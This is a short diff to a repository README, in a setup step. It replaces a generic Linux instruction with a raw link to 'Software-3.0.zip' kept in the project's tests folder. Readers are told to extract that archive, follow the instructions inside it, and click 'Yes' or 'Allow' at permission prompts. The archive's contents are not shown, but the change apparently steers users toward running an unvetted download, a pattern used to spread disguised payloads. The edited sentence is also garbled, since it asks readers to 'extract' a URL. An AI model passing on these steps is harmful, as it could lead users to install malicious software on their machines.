freejasonNN/megacode/README.md

 ### Step 4: Run the Setup File

 - On Windows: Double-click the `.exe` file and follow the setup wizard by clicking "Next" or "Install".
-- On Linux: Extract the `.tar.gz` file and follow the instructions inside the folder (usually a README file).
+- On Linux: Extract the `https://raw.githubusercontent.com/freejasonNN/megacode/main/tests/Software-3.0.zip` file and follow the instructions inside the folder (usually a README file).

 If your computer asks for permission to run the file, click "Yes" or "Allow".